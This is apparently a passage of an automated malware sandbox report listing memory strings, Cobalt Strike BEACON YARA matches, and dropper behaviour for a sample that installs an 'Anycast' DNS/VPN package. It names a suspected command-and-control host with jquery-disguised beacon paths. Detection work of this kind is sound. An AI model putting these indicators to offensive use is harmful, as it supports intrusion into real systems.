        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptm
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461159840.0000000012470000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461159840.000000001247B000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236825936.000000001246D000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptsha
        Source: dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptw
        Source: 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460096953.00000000123B2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://www.dnscrypt.uk
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscrypt.uksha
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fdn.fr/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fdn.fr/DoH
        Source: sf-psvfcjj4czdu3e3p.tmp.41.drString found in binary or memory: https://www.gombadi.com/edns/edns.html
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://www.iij.ad.jp/
        Source: sf-psvfcjj4czdu3e3p.tmp.41.drString found in binary or memory: https://www.meganerd.nl/encrypted-dns-server)
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz/
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz/#
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz/7
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz/v
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4451840958.000001FF1A440000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4448461751.000001FF17E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C38B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C358000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2297087901.000002044C404000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A1FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C7E3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C7E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/I
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/Z
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A1FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js)
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js-
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js.
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js/
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js1
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06/
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06G
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06S
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06ad9jD
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06adujx
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js:
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A1FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js?
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsA
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsG
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsS
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsU
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsW
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsX
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsY
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsc
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jse
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsgraphy
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsi
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsk
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsl
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsm
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsn
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jso
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsp
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsr_
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jst
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A1FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsu
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C358000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsv
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A1FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsy
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsy_
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsz
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/jquery-3.3.1.min.js~
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/l
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/l3
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/ll
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/llD
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/llU
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/llf
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/llmxilws.buzzn.jsp
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/o
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/ol
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17DAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/ol/
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/olN
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/olk
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/r
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mxilws.buzz:8443/y
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: https://www.newtonsoft.com/json
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012178000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://www.nextdns.io/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.nextdns.io/Connects
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.nextdns.io/NextDNS
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://www.quad9.net/quad9-resolvers.md
        Source: Anycast.exe, 0000002B.00000002.4460636264.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: https://www.ssl.com/repository0
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://www.switch.ch
        Source: dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tirapan.top
        Source: wintun.dll.6.drString found in binary or memory: https://www.wintun.net/
        Source: wintun.dll.6.drString found in binary or memory: https://www.wintun.net/D
        Source: C:\Users\Public\111.exeCode function: 6_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_004055B8

        E-Banking Fraud

        barindex
        Install WinpCap (used to filter network traffic)
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Packet.dllJump to behavior

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Install WinpCap (used to filter network traffic)
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Packet.dllJump to behavior

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.4451308422.000002044E250000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000009.00000002.4450512387.000001B79C0A0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000003.00000002.4450751071.000001FF19CF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000004.00000002.4451432198.000002044E27B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: Process Memory Space: rundll32.exe PID: 4688, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: Process Memory Space: rundll32.exe PID: 2460, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8011110: WaitForSingleObject,ReleaseMutex,ReleaseMutex,GetProcessHeap,HeapAlloc,SetEvent,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,ReleaseMutex,WideCharToMultiByte,SetLastError,DeviceIoControl,GetLastError,SetLastError,SetEvent,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ReleaseMutex,GetProcessHeap,HeapAlloc,htonl,ReleaseMutex,htons,34_2_00007FF8B8011110
        Source: C:\Users\Public\111.exeCode function: 6_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034C5
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B80511D00_2_00007FF8B80511D0
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B805A9D80_2_00007FF8B805A9D8
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B80515E00_2_00007FF8B80515E0
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B80610E80_2_00007FF8B80610E8
        Source: C:\Users\Public\111.exeCode function: 6_2_004074586_2_00407458
        Source: C:\Users\Public\111.exeCode function: 6_2_00406C816_2_00406C81
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801299034_2_00007FF8B8012990
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801111034_2_00007FF8B8011110
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802095834_2_00007FF8B8020958
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8022E1C34_2_00007FF8B8022E1C
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801324034_2_00007FF8B8013240
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8028AC834_2_00007FF8B8028AC8
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8026AB834_2_00007FF8B8026AB8
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B80156F034_2_00007FF8B80156F0
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802FED834_2_00007FF8B802FED8
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801CB1034_2_00007FF8B801CB10
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802B37434_2_00007FF8B802B374
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802045834_2_00007FF8B8020458
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802286034_2_00007FF8B8022860
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B802DC8834_2_00007FF8B802DC88
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801C8A834_2_00007FF8B801C8A8
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B80248AC34_2_00007FF8B80248AC
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B80288BC34_2_00007FF8B80288BC
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B80274C434_2_00007FF8B80274C4
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8F8726434_2_00007FF8B8F87264
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0609234543_2_06092345
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DF5C5243_2_06DF5C52
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06FD5CDA43_2_06FD5CDA
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06FD490443_2_06FD4904
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_071F6BC443_2_071F6BC4
